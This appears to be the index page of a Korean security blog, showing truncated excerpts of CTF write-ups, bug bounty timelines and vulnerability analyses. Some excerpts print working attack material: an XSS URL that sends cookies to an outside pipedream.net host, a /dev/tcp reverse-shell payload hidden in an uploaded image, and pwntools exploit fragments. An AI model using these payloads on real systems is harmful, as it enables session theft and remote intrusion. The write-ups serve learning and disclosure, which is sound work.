Universe blog

🚪 Intro 취약점 및 CVE 획득을 위해 분석하고 있는 프로젝트가 있습니다. file upload를 통한 webshell 획득 과정을 정리하고자 합니다. 💡 Analysis 분석하려는 웹 사이트에는 업로드 기능이 존재 합니다. 다만 ico, webp, svg 확장자만 업로드 할 수 있습니다. 그런데 아래 코드를 보면서 의문점이 생기더라구요. 보통 파일 업로드 관련 기능을 만들 때, 확장자 검증은 .(dot) 을 기준으로 문자열을 나누어 맨 마지막 값을..

📅 Timeline 2022-03-14: Reported vulnerability. 2022-03-14: Checked report. 2022-03-16: Verified a vulnerability and reported to dev department. 2022-04-21: Fixed a Vulnerability. Comming soon.

📅 Timeline 2022-02-21: Reported vulnerability. 2022-02-22: Checked report. 2022-02-22: Verified a vulnerability and reported to dev department. 2022-04-13: Fixed a Vulnerability. Comming soon.

📅 Timeline 2022-01-06: Reported vulnerability. 2022-01-06: Checked report. 2022-01-06: Verified a vulnerability and reported to dev department. 2022-02-23: Fixed a Vulnerability. 2022-03-22: Bounty time.

📅 Timeline 2021-12-21: Reported vulnerability. 2021-12-22: Checked report. 2021-12-22: Verified a vulnerability and reported to dev department. 2022-01-12: Fixed a Vulnerability. 2022-02-08: Bounty time.

📅 Timeline 2021-04-09: Reported vulnerability. 2021-04-12: Checked report. 2021-04-12: Verified vulnerability and reported to dev department. 2021-05-17: Fixed Vulnerability.

📅 Timeline 2021-11-10: Reported vulnerability. 2021-11-10: Checked report. 2021-11-10: Verified vulnerability and forword to manufacturer. 2021-12-06: Bounty time.

📅 Timeline 2021-12-27: Reported vulnerability. 2021-12-27: Checked report. 2021-02-15: Verified vulnerability and forword to manufacturer. 2021-04-05: Bounty time.

📅 Timeline 2021-10-12: Reported vulnerability. 2021-10-12: Checked report. 2021-10-12: Verified vulnerability and forword to manufacturer. 2022-01-04: Bounty time.

📅 Timeline 2021-06-10: Reported vulnerability. 2021-06-30: Checked report. 2021-07-30: Verified vulnerability and forword to manufacturer. 2021-10-14: Bounty time.

🚪 Intro 취약점을 찾기 위해 분석하고 있는 오픈소스 웹 서비스가 있습니다. 며칠 동안 삽질을 통해 발견한 취약점(?)을 기록 및 정리하고자 합니다. 💡 Analysis 해당 취약점은 웹 관리자만 접근 가능하며, php dynamic variable 을 통해 다른 변수의 값을 overwrite 하여 Stored XSS를 동작 시킬 수 있습니다. 관리자 페이지에는 아래 사진처럼 어떤 범위를 지정해 줄 수 있습니다. 하지만, 해당 소스 코드를 분석해 본 결과,..

GitFile Explorer (web) 이번 문제는 `preg_match()` 함수를 우회하여 `file_get_contents()` 함수로 flag를 획득하는 문제이다. 34번째 줄에 `preg_match()` 함수 안에 정규 표현식을 보면, github|gitlab|gitbucket 문자열은 어디에나 존재하면 된다. 즉, `http://askldjfklasd.github.com` 이런 것이 가능하다. 또한, `m` 이라는 옵션이 붙었는데, 이에 대한 설명은 다음과 같다. 즉, 다음과 같이 개행을 포함하여 전송하..

# Warmup (pwn) 해당 문제는 FSB 를 통해 canary 값과 PIE 값을 leak 한 뒤, ROP로 shell을 획득하는 문제이다. from pwn import * context.log_level = "debug" p = remote("chall.nitdgplug.org","30091") e = ELF("./chall2") l = ELF("./libc.so.6") payload = "AAAAAAAA%20$p%23$p" p.sendlineafter("Can you help find the Canary ?", payload) p.recvline() data = p.recvline().strip()[8:] PIE = int(data[:14], 16)..

최근 CTF에서 nodejs express 문제가 나왔다. express에서 routing 기능이 있는데, 선택 옵션을 추가할 수 있다는 걸 처음 알았다. express Docs 내용 중, 아래 사진을 보면, Router에 대한 설명을 적어놓았다. 표에서 속성에 `caseSensitive` 라는 옵션이 있고, 만약 추가하지 않는다면 기본값으로 `대소문자를 구문하지 않고, /Foo와 /foo는 같은 경로로 해석한다.` 라고 되어 있다. 그래서 테스트를 위해 다음과 같이 코드..

올해 codegate 2022 웹 문제 중에서 java에 `URL class`를 이용한 SSRF 문제가 나왔다. 아래 코드는 `URL class`를 이용하여 외부 사이트에 요청 및 응답 값을 출력하는 코드 이다. import java.net.URL; import java.net.MalformedURLException; import java.io.InputStreamReader; import java.io.BufferedReader; public class test{ public static void main(String[] args){ String url = "https://lactea.kr"; String res..

Cyberchef (web) XSS를 통한 Cookie 탈취 문제이다. cyberchef 는 github에 opensource로 공개되어 있는데, issue 에서 XSS payload를 얻을 수 있었다. https://github.com/gchq/CyberChef/issues/1265 http://1.230.253.91:8000/#recipe=Scatter_chart('Line%20feed','Space',false,'','','red%22%3E%3Cscript%3Elocation.href%3D%60https://enej1x0to8q6ktu.m.pipedream.net/?cookie%3D$%7Bdocument.cookie%7D`%3C/script%3E'..

오랜만에 CTF에 참가하여 WEB 문제 중, php의 `sprintf()` 함수를 이용한 문제가 있었다. 아래 코드를 보면, SQL `addslashes()` 함수 때문에 SQLI 가 불가능한 것처럼 보이지만, `sprintf()` 함수에서 format string을 이용하면 이를 bypass 할 수 있다. 이를 설명하기 위해 글을 계속 읽어보자.

내년이면 4학년에 반오십이라니.. 올해는 좀 특별한 일로 많이 바빴던거 같다. 올해 어떤 것을 했는지 간단하게 적어 보았다. 개인 프로젝트  동아리에서 개인 프로젝트를 진행 했는데, 성공적으로 마무리 했다. 하나는 동아리 프로젝트 자료를 관리하는 Project Manager 라는 오픈소스 프로젝트와 Bug Bounty, 1-day 분석 이다.  Project Manager(https://github.com/CASPER-REPSAC/project-manager) 는 nodejs로 만들었고,..

1. 기초 지식 1.1 Directory Service(DS) 여기서 말하는 Directory는 데이터, 프린터, 컴퓨터, 사용자 정보 등 데이터가 저장된 용기라고 보면 된다. Directory Service는 네트워크 서비스의 일종으로 네트워크 자원(사용자 계정, 프린트 정보, 컴퓨터 정보 등)에 접근하여 관리를 용이하게 하도록 하는 서비스를 말한다. 1.2 Active Directory AD(Active Directory)는 Microsoft에서 개발한 디렉토리 서비스 이다. AD는 다양한..

FV Flowplayer 비디오 플레이어 WordPress's most reliable, easy to use and feature-rich video player. Supports responsive design, HTML5, playlists, ads, stats, Vimeo and YouTube … ko.wordpress.org CVE-2021-39350는 wordpress의 플러그인 중 FV flowplayer에서 발생한 `Reflected XSS` 취약점이다. 취약한 버전은 `7.5.0.727` ~ `7.5.2.727` 이고, 패치 버전은 `7.5.3.727` 이다. FV flowplayer 의 패치 버전 commi..

[WEB - "Hermit - Part 1"] 위 문제 링크에 접속하면 이미지를 업로드 하는 페이지가 나온다. 아래 사진 처럼 이미지를 업로드 하면 png의 hex값과 함께 이미지가 출력된다. 업로드할 이미지 맨 마지막에 간단한 php 코드를 작성한뒤 업로드 하면 php 코드가 동작하는 것을 볼 수 있다. 이를 이용하여 reverse shell 공격을 시도 했다. payload는 다음과 같다. & /dev/tcp/'Your IP'/'Y..

WEB / finger-warmup 문제 사이트에 접속하면 아래 사진 처럼 클릭하는 링크가 나온다. 클릭하면 똑같은 페이지 이지만, 주소 뒤에 랜덤한 값이 따라 붙는다. 문제 힌트에 `requests` 모듈과 `beautifulsoup` 모듈을 사용하라고 되어 있어, `a` 태그를 크롤링해 계속 클릭하면 flag를 획득 할 수 있을 거라고 생각했다. import requests import bs4 import time url = "https://finger-warmup.chals.damctf.xyz/" s = request..

There is no Spoon keyword: `Heap overflow` #include #include #include #include char * xor(char * src, char * dest, int len) { for(int i = 0; i < len - 1; i++) { dest[i] = src[i] ^ dest[i]; } dest[len-1] = 0; return dest; } int main() { setvbuf(stdout, 0, 2, 0); setvbuf(stderr, 0, 2, 0); char buffer[256]; int len = 256; printf("Neo, enter your matrix: "); len = read(0, buffer, len); char * buff..

`glib 2.24` 이상 버전 부터 `_IO_validate_vtable()` 로 `vtable`을 검사한다. 이 때문에 `vtable` 값을 공격자가 원하는 함수의 주소로 overwrite 할 수가 없다. 하지만 `glibc 2.27` 버전까지 이를 bypass 할 수 있는 방법이 있는데, `_IO_str_overflow()` 함수와 `_IO_str_finish()` 함수를 이용한 bypass 공격 방법이 있다. 아래 설명하는 내용은 `glibc 2.29` 버전에 패치 되었다. _IO_validate_vtable() 이 함수는 `glibc..

_IO_FILE 리눅스 시스템의 표준 라이브러리에서 파일 스트림을 나타내기 위한 구조체입니다. 이 구조체는 `fopen()`, `fwrite()`, `fclose()` 등 파일 스트림을 사용하는 함수가 호출되었을때 할당 됩니다. `_IO_FILE`의 구조체는 다음과 같습니다. struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ /* The following pointers correspond to the C++ streambuf protocol. */ char *_IO_read_..

pwnable 분야의 validator 문제이다. 해당 문제는 바이너리만 주워줬고, 바이너리 파일을 c 나타내면 다음과 같다. void validate(void *input_data, int arg2){ for (int i = 0; i <= 9; i = i + 1){ if (input_data[i] != correct[i]) exit(0); } int var_c = 0xb; while (true){ if (arg2 <= var_c) return 0; if (input_data[var_c] != (input_data[var_c + 1] + 1)) break; var_c = var_c + 1; } exit(0); } int main(){ v..

web 분야의 Mango 문제이다. 해당 문제는 코드가 주워줬고, `mongodb injection` 으로 admin 의 pw를 알아내는 문제이다. const express = require('express'); const app = express(); const mongoose = require('mongoose'); mongoose.connect('mongodb://localhost/main', { useNewUrlParser: true, useUnifiedTopology: true }); const db = mongoose.connection; // flag is in db, {'uid': 'admin', 'upw': 'DH{32alphanu..

1. Source php의 `auto type casting` 문제 인거 같다. SOURCE 10000){ echo (' Correct darkCTF{} '); } else { echo (' Wrong! Ohhhhh!!! Very Close '); } } else { echo (' Wrong! Nice!!! Near But Far '); } } else { echo (' Wrong! Ahhhhh!!! Try Not Easy '); } ?> 위 코드를 보면 `$_SERVER['HTTP_USER_AGENT']..

pwnable 분야의 두번째 문제 newPaX 이다. Checksec Analyze 이번 바이너리에는 `main()` 과 `vuln()` 이렇게 2개가 있는데, `main()` 함수에는 별거 없고 `vuln()` 함수에서 `BOF` 공격이 가능하다. 이전 문제와 다른점은 `32bit` 라는 점이다. `32bit rop` 공격은 `64bit` 와 다르기 때문에, 아래 코드 처럼 `stack` 에 데이터를 overwrite 했다. 필자는 `read()` 함수의 `GOT`를 leak 했고, libc database 사이트에서 라이..

pwnable 분야의 첫번째 문제 roprop 이다. (write up을 작성하는 시점에서 서버가 닫혀있어 설명하는데 지장이...) Checksec ubuntu:~/environment/ctf/DarkCTF/pwn/01_rop $ checksec roprop [*] '/home/ubuntu/environment/ctf/DarkCTF/pwn/01_rop/roprop' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) Analyze 바이러니는 `main` 함수만 정의 되어 있다. `get..